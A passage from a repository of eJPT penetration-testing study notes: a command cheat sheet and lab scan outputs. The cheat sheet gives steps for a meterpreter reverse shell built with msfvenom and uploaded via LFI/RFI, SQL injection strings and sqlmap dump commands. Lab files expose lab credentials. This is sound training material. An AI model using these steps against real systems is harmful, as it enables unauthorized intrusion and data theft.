Repository: JasonTurley/eJPT Branch: main Commit: 4a608ce9afa0 Files: 71 Total size: 126.3 KB Directory structure: gitextract_f6pnax8e/ ├── LICENSE ├── README.md ├── cheat-sheet.md ├── ine-labs/ │ ├── arp-poisoning/ │ │ ├── alive_hosts.txt │ │ └── nmap_scan.txt │ ├── black-box1/ │ │ ├── alive_hosts.txt │ │ ├── dot101_DONE/ │ │ │ ├── README.md │ │ │ ├── default-passwords.txt │ │ │ ├── default-users.txt │ │ │ └── passwd │ │ ├── dot140_done/ │ │ │ ├── dirb_scan2.txt │ │ │ ├── sdadas.txt │ │ │ └── test1.txt │ │ ├── dot199/ │ │ │ ├── enum4linux.txt │ │ │ └── nmap_scan.txt │ │ ├── id_rsa.pub │ │ ├── initial_nmap_scan.txt │ │ ├── possible-usernames.txt │ │ └── thorough_nmap_scan.txt │ ├── black-box2/ │ │ ├── alive_hosts.txt │ │ ├── dot166_DONE/ │ │ │ ├── dirb_scan.txt │ │ │ ├── for_hydra.txt │ │ │ └── names.txt │ │ ├── dot81_DONE/ │ │ │ ├── dirb_scan.txt │ │ │ └── users.bak │ │ ├── dot91/ │ │ │ ├── dirb_scan.txt │ │ │ ├── gobuster_foocorp_scan.txt │ │ │ ├── gobuster_foocorp_scan2.txt │ │ │ ├── gobuster_scan.txt │ │ │ ├── myapp.html │ │ │ └── php-reverse-shell.php │ │ ├── dot92_DONE/ │ │ │ ├── dirb_scan.txt │ │ │ └── user-hashes.txt │ │ └── thorough_nmap_scan.txt │ ├── black-box3/ │ │ ├── alive_hosts.txt │ │ ├── dot220/ │ │ │ └── gobuster_scan.txt │ │ ├── dot234/ │ │ │ ├── for_john.txt │ │ │ ├── gobuster_scan.txt │ │ │ ├── index.php │ │ │ ├── revshell.php │ │ │ └── scan_xyz.txt │ │ └── thorough_nmap_scan.txt │ ├── bruteforce-and-password-cracking/ │ │ ├── alive_hosts.txt │ │ ├── for_john.txt │ │ ├── nmap_scan.txt │ │ ├── passwd │ │ └── shadow │ ├── dirbuster/ │ │ ├── alive_hosts.txt │ │ └── nmap_scan.txt │ ├── exploit-based-cpp/ │ │ ├── exploit.cpp │ │ └── keylogger.cpp │ ├── metasploit/ │ │ ├── README.md │ │ ├── hashdump.txt │ │ └── nmap_scan.txt │ ├── nessus/ │ │ └── nmap_scan.txt │ ├── null-session/ │ │ ├── Congratulations.txt │ │ ├── alive_hosts.txt │ │ ├── enum4linux_scan.txt │ │ └── nmap_scan.txt │ ├── practice/ │ │ ├── hello.php │ │ ├── index.html │ │ ├── my-ls.sh │ │ ├── script.sh │ │ ├── sequences.sh │ │ └── shell.php │ ├── python-assisted-exploitation/ │ │ └── brute-forcer.py │ └── scanning-and-os-fingerprinting/ │ ├── fping_scan.txt │ ├── nmap_ping_scan.txt │ ├── nmap_syn_scan.txt │ └── nmap_version_and_os.txt └── scripts/ └── eEnum.sh ================================================ FILE CONTENTS ================================================ ================================================ FILE: LICENSE ================================================ MIT License Copyright (c) 2022 Jason Turley Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ================================================ FILE: README.md ================================================ # eJPT My notes and lab solutions from studying for the eLearnSecurity Junior Penetration Tester certificate. ## Cheat Sheet Check out the [cheatsheet](./cheat-sheet.md) for a list of useful commands and tips. ================================================ FILE: cheat-sheet.md ================================================ # Cheat Sheet This cheat sheet is a list of commands to help with the black box pen test engagements. ## Networking Check routing table information ``` $ route $ ip route ``` Add a network to current route ``` $ ip route add 192.168.10.0/24 via 10.175.3.1 $ route add -net 192.168.10.0 netmask 255.255.255.0 gw 10.175.3.1 ``` DNS ``` $ nslookup mysite.com $ dig mysite.com ``` ## Subdomain Enumeration - [Sublist3r](https://github.com/aboul3la/Sublist3r) - [DNSdumpster](https://dnsdumpster.com/) ## Footprinting & Scanning Find live hosts with fping or nmap ``` $ fping -a -g 172.16.100.40/24 2>/dev/null | tee alive_hosts.txt $ nmap -sn 172.16.100.40/24 -oN alive_hosts.txt ``` nmap scan types ``` -sS: TCP SYN Scan (aka Stealth Scan) -sT: TCP Connect Scan -sU: UDP Scan -sn: Port Scan -sV: Service Version information -O: Operating System information ``` ### Spotting a Firewall If an nmap TCP scan identified a well-known service, such as a web server, but cannot detect the version, then there may be a firewall in place. For example: ``` PORT STATE SERVICE REASON VERSION 80/tcp open http? syn-ack ttl 64 ``` Another example: ``` 80/tcp open tcpwrapped ``` **"tcpwrapped"** means the TCP handshake was completed, but the remote host closed the connection without receiving any data. These are both indicators that a firewall is blocking our scan with the target! Tips: - Use "--reason" to see why a port is marked open or closed - If a "RST" packet is received, then something prevented the connection - probably a firewall! ## Masscan Masscan is designed to scan thousands of IP addresses at once. ## Vulnerability Assessment Use the information from the Enumeration/Footprinting phases to find a vulnerable threat vector. Below are some helpful Vulnerability assessment resources: - Searchsploit - ExploitDB - Msfconsole search command - Google - Nessus ## Web Server Fingerprinting Use netcat for HTTP banner grabbing: ``` $ nc 80 HEAD / HTTP/1.0 ``` Use OpenSSL for HTTPS banner grabbing: ``` $ openssl s_client -connect target.site:443 HEAD / HTTP/1.0 ``` httprint is a web fingerprinting tool that uses **signature-based** technique to identify web servers. This is more accurate since sysadmins can customize web server banners. ``` $ httprint -P0 -h -s ``` ## Directory and File Enumeration Pick your favorite URI Enumeration tool - Gobuster - fast, multi-threaded scanner - Dirbuster - nice GUI - Dirb - recursively scans directories ## XSS Look to exploit user input coming from: - Request headers - Cookies - Form inputs - POST parameters - GET parameters Check for XSS ``` some text ``` Steal cookies: ``` ``` ## SQL Injection Same injection points as XSS. Boolean Injection: - and 1=1; -- - - or 'a'='a'; -- - Once you determine that a site is vulnerable to SQLi, automate with SQL Map. ``` $ sqlmap -u $ sqlmap -u -p $ sqlmap -u --tables $ sqlmap -u -D -T --dump ``` ## Windows Shares Enumeration Check what shares are available on a host ``` $ smbclient -L //ip $ enum4linux -a ip_address ``` ## SMB Null Attack Try to login without a username or password: ``` $ smbclient //ip/share -N ``` ## MySQL Database commands Login to MySQL with password ``` $ mysql --user=root --port=13306 -p -h 172.16.64.81 ``` ``` > SHOW databases; > SHOW tables FROM databases; > USE database; > SELECT * FROM table; ``` Change table entry values ``` # Add the user tracking1 to the "adm" group > update users set adm="yes" where username="tracking1"; ``` ## Meterpreter reverse shell 1. Find vulnerability in target (e.g. LFI/RFI) 2. Set up a Metasploit listener ``` use exploit/multi/handler set payload linux/x64/meterpreter_reverse_tcp # or any payload you wish set lhost set lport # set to a port open on the target to bypass firewall run ``` 3. Create a matching meterpreter-based executable using msfvenom ``` msfvenon -p linux/x64/meterpreter_reverse_tcp lhost= lport= -f elf -o meter ``` 4. Upload the payload to target (e.g LFI/RFI) ## Adding Virtual Hosts In the black box practice labs, we had to add a virtual host to /etc/hosts in order to connect to the webpage. ``` $ sudo vim /etc/hosts static.foobar.org ``` ## Misc - Found a webshell/admin panel on a site? - Run phpinfo(); to determine if it is a PHP shell - Try to get a reverse shell connection - Check for flag in the user's home directory - Enumerate, enumerate, enumerate ================================================ FILE: ine-labs/arp-poisoning/alive_hosts.txt ================================================ 10.100.13.36 10.100.13.37 10.100.13.140 ================================================ FILE: ine-labs/arp-poisoning/nmap_scan.txt ================================================ # Nmap 7.91 scan initiated Sun Feb 21 18:21:32 2021 as: nmap -sV -iL alive_hosts.txt -oN nmap_scan.txt Nmap scan report for 10.100.13.36 Host is up (0.085s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Nmap scan report for 10.100.13.37 Host is up (0.071s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0) 23/tcp open telnet Linux telnetd Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Nmap scan report for 10.100.13.140 Host is up (0.00020s latency). All 1000 scanned ports on 10.100.13.140 are closed Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Feb 21 18:21:39 2021 -- 3 IP addresses (3 hosts up) scanned in 7.52 seconds ================================================ FILE: ine-labs/black-box1/alive_hosts.txt ================================================ 172.16.64.101 172.16.64.140 172.16.64.182 172.16.64.199 ================================================ FILE: ine-labs/black-box1/dot101_DONE/README.md ================================================ # Apache Tomcat Webserver ## Recon Running gobuster shows hidden /manager directory that requires a username and password. On the 401 Unauthorized error page, shows an example with username=tomcat and password=s3cret. ## Initial Exploitation Use msfconsole to search for apache tomcat manager exploit ``` meterpreter > getuid tomcat8 meterpreter > sysinfo Computer : xubuntu OS : Linux 4.4.0-104-generic (amd64) Meterpreter : java/linux ``` Search for the flag: ``` meterpreter > search -f flag.txt Found 2 results... /home/adminels/Desktop/flag.txt (12 bytes) /home/developer/flag.txt (29 bytes) meterpreter > cat /home/adminels/Desktop/flag.txt You did it! meterpreter > cat /home/developer/flag.txt Congratulations, you got it! ``` Other users in the home directory: ``` adminels developer elsuser ``` ================================================ FILE: ine-labs/black-box1/dot101_DONE/default-passwords.txt ================================================ admin tomcat password password1 Password1 manager root toor r00t s3cret role1 changethis ================================================ FILE: ine-labs/black-box1/dot101_DONE/default-users.txt ================================================ admin root tomcat role role1 manager ================================================ FILE: ine-labs/black-box1/dot101_DONE/passwd ================================================ root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106:110::/var/run/dbus:/bin/false uuidd:x:107:111::/run/uuidd:/bin/false lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false whoopsie:x:109:116::/nonexistent:/bin/false avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false colord:x:112:123:colord colour management daemon,,,:/var/lib/colord:/bin/false dnsmasq:x:113:65534:dnsmasq,,,:/var/lib/misc:/bin/false hplip:x:114:7:HPLIP system user,,,:/var/run/hplip:/bin/false kernoops:x:115:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false pulse:x:116:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:117:126:RealtimeKit,,,:/proc:/bin/false saned:x:118:127::/var/lib/saned:/bin/false usbmux:x:119:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false speech-dispatcher:x:120:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false elsuser:x:1000:1000:elsuser,,,:/home/elsuser:/bin/bash sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin tomcat8:x:122:129::/usr/share/tomcat8:/bin/false ================================================ FILE: ine-labs/black-box1/dot140_done/dirb_scan2.txt ================================================ ----------------- DIRB v2.22 By The Dark Raver ----------------- OUTPUT_FILE: dirb_scan2.txt START_TIME: Wed Feb 24 14:11:27 2021 URL_BASE: http://172.16.64.140/project/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt AUTHORIZATION: admin:admin ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://172.16.64.140/project/ ---- ==> DIRECTORY: http://172.16.64.140/project/backup/ ==> DIRECTORY: http://172.16.64.140/project/css/ ==> DIRECTORY: http://172.16.64.140/project/images/ + http://172.16.64.140/project/includes (CODE:403|SIZE:304) + http://172.16.64.140/project/index.html (CODE:200|SIZE:6525) ---- Entering directory: http://172.16.64.140/project/backup/ ---- ==> DIRECTORY: http://172.16.64.140/project/backup/backup/ ==> DIRECTORY: http://172.16.64.140/project/backup/css/ ==> DIRECTORY: http://172.16.64.140/project/backup/images/ + http://172.16.64.140/project/backup/index.html (CODE:200|SIZE:6525) ==> DIRECTORY: http://172.16.64.140/project/backup/test/ ---- Entering directory: http://172.16.64.140/project/css/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://172.16.64.140/project/images/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://172.16.64.140/project/backup/backup/ ---- ================================================ FILE: ine-labs/black-box1/dot140_done/sdadas.txt ================================================ Driver={SQL Server};Server=foosql.foo.com;Database=;Uid=fooadmin;Pwd=fooadmin; /var/www/html/project/354253425234234/flag.txt ================================================ FILE: ine-labs/black-box1/dot140_done/test1.txt ================================================ https://stackoverflow.com/questions/1134319/difference-between-a-user-and-a-login-in-sql-server ================================================ FILE: ine-labs/black-box1/dot199/enum4linux.txt ================================================ Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Feb 24 12:24:59 2021 ========================== | Target Information | ========================== Target ........... 172.16.64.199 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ===================================================== | Enumerating Workgroup/Domain on 172.16.64.199 | ===================================================== [+] Got domain/workgroup name: WORKGROUP ============================================= | Nbtstat Information for 172.16.64.199 | ============================================= Looking up status of 172.16.64.199 WIN10 <00> - B Workstation Service WORKGROUP <00> - B Domain/Workgroup Name WIN10 <20> - B File Server Service MAC Address = 00-50-56-A2-AD-96 ====================================== | Session Check on 172.16.64.199 | ====================================== [E] Server doesn't allow session using username '', password ''. Aborting remainder of tests. ================================================ FILE: ine-labs/black-box1/dot199/nmap_scan.txt ================================================ # Nmap 7.91 scan initiated Wed Feb 24 12:18:57 2021 as: nmap -sV --reason -oN nmap_scan.txt 172.16.64.199 Nmap scan report for 172.16.64.199 Host is up, received conn-refused (0.070s latency). Not shown: 996 closed ports Reason: 996 conn-refused PORT STATE SERVICE REASON VERSION 135/tcp open msrpc syn-ack Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? syn-ack 1433/tcp open ms-sql-s syn-ack Microsoft SQL Server 2014 12.00.2000 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Feb 24 12:19:30 2021 -- 1 IP address (1 host up) scanned in 33.26 seconds ================================================ FILE: ine-labs/black-box1/id_rsa.pub ================================================ ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAlGWzjgKVHcpaDFvc6877t6ZT2ArQa+OiFteRLCc6TpxJ/lQFEDtmxjTcotik7V3DcYrIv3UsmNLjxKpEJpwqELGBfArKAbzjWXZE0VubmBQMHt4WmBMlDWGcKu8356blxom+KR5S5o+7CpcL5R7UzwdIaHYt/ChDwOJc5VK7QU46G+T9W8aYZtvbOzl2OzWj1U6NSXZ4Je/trAKoLHisVfq1hAnulUg0HMQrPCMddW5CmTzuEAwd8RqNRUizqsgIcJwAyQ8uPZn5CXKWbE/p1p3fzAjUXBbjB0c7SmXzondjmMPcamjjTTB7kcyIQ/3BQfBya1qhjXeimpmiNX1nnQ== rsa-key-20190313###ssh://developer:dF3334slKw@172.16.64.182:22############################################################################################################################################################################################# ================================================ FILE: ine-labs/black-box1/initial_nmap_scan.txt ================================================ # Nmap 7.91 scan initiated Tue Feb 23 21:45:06 2021 as: nmap -sV -O -iL alive_hosts.txt -oN initial_nmap_scan.txt Nmap scan report for 172.16.64.10 Host is up (0.00021s latency). All 1000 scanned ports on 172.16.64.10 are closed Too many fingerprints match this host to give specific OS details Network Distance: 0 hops Nmap scan report for 172.16.64.101 Host is up (0.061s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 9080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 MAC Address: 00:50:56:A2:CE:79 (VMware) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/23%OT=22%CT=1%CU=37260%PV=Y%DS=1%DC=D%G=Y%M=005056%T OS:M=6035BDE2%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=108%TI=Z%CI=I%II=I OS:%TS=8)SEQ(SP=103%GCD=1%ISR=106%TI=Z%CI=I%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7 OS:ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1 OS:=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O OS:=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N OS:)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A= OS:S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF OS:=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL= OS:G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Nmap scan report for 172.16.64.140 Host is up (0.062s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) MAC Address: 00:50:56:A2:ED:B9 (VMware) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/23%OT=80%CT=1%CU=42454%PV=Y%DS=1%DC=D%G=Y%M=005056%T OS:M=6035BDE2%P=x86_64-pc-linux-gnu)SEQ(SP=109%GCD=1%ISR=10B%TI=Z%CI=I%II=I OS:%TS=8)SEQ(SP=108%GCD=1%ISR=10B%TI=Z%II=I%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7 OS:ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1 OS:=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O OS:=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N OS:)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A= OS:S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF OS:=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL= OS:G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 1 hop Nmap scan report for 172.16.64.182 Host is up (0.068s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) MAC Address: 00:50:56:A2:10:16 (VMware) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/23%OT=22%CT=1%CU=39565%PV=Y%DS=1%DC=D%G=Y%M=005056%T OS:M=6035BDE2%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10C%TI=Z%CI=I%II=I OS:%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O OS:5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6 OS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD= OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0% OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1( OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI= OS:N%T=40%CD=S) Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Nmap scan report for 172.16.64.199 Host is up (0.065s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 1433/tcp open ms-sql-s Microsoft SQL Server 2014 12.00.2000 MAC Address: 00:50:56:A2:AD:96 (VMware) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/23%OT=135%CT=1%CU=43296%PV=Y%DS=1%DC=D%G=Y%M=005056% OS:TM=6035BDE2%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=104%TI=I%CI=I%II= OS:I%SS=S%TS=A)SEQ(SP=100%GCD=1%ISR=102%TI=I%CI=I%TS=A)OPS(O1=M4E7NW8ST11%O OS:2=M4E7NW8ST11%O3=M4E7NW8NNT11%O4=M4E7NW8ST11%O5=M4E7NW8ST11%O6=M4E7ST11) OS:WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W= OS:2000%O=M4E7NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y% OS:DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR% OS:O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80% OS:W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q= OS:)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164% OS:UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z) Network Distance: 1 hop Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Feb 23 21:45:54 2021 -- 5 IP addresses (5 hosts up) scanned in 48.25 seconds ================================================ FILE: ine-labs/black-box1/possible-usernames.txt ================================================ elsadmin adminels elsuser developer tomcat manager root admin dummy nao12023 ================================================ FILE: ine-labs/black-box1/thorough_nmap_scan.txt ================================================ # Nmap 7.91 scan initiated Wed Feb 24 13:41:35 2021 as: nmap -sV -n -T4 -Pn -p- -A -iL alive_hosts.txt -v --open -oN thorough_nmap_scan.txt Nmap scan report for 172.16.64.101 Host is up (0.074s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 7f:b7:1c:3d:55:b3:9d:98:58:11:17:ef:cc:af:27:67 (RSA) | 256 5f:b9:93:e2:ec:eb:f7:08:e4:bb:82:d0:df:b9:b1:56 (ECDSA) |_ 256 db:1f:11:ad:59:c1:3f:0c:49:3d:b0:66:10:fa:57:21 (ED25519) 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 | http-methods: | Supported Methods: GET HEAD POST PUT DELETE OPTIONS |_ Potentially risky methods: PUT DELETE |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache2 Ubuntu Default Page: It works 9080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 | http-methods: | Supported Methods: GET HEAD POST PUT DELETE OPTIONS |_ Potentially risky methods: PUT DELETE |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache2 Ubuntu Default Page: It works 59919/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works MAC Address: 00:50:56:A2:CE:79 (VMware) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/24%OT=22%CT=1%CU=30533%PV=Y%DS=1%DC=D%G=Y%M=005056%T OS:M=60369EA7%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10A%TI=Z%CI=I%II=I OS:%TS=8)OPS(O1=M4E7ST11NW7%O2=M4E7ST11NW7%O3=M4E7NNT11NW7%O4=M4E7ST11NW7%O OS:5=M4E7ST11NW7%O6=M4E7ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6 OS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M4E7NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD= OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0% OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1( OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI= OS:N%T=40%CD=S) Uptime guess: 0.129 days (since Wed Feb 24 10:38:56 2021) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=259 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 74.30 ms 172.16.64.101 Nmap scan report for 172.16.64.140 Host is up (0.081s latency). Not shown: 65534 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: OPTIONS GET HEAD POST |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: 404 HTML Template by Colorlib MAC Address: 00:50:56:A2:ED:B9 (VMware) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=2/24%OT=80%CT=1%CU=32277%PV=Y%DS=1%DC=D%G=Y%M=005056%T OS:M=60369EA7%P=x86_64-pc-linux-gnu)SEQ(SP=F9%GCD=1%ISR=105%TI=Z%CI=I%II=I% 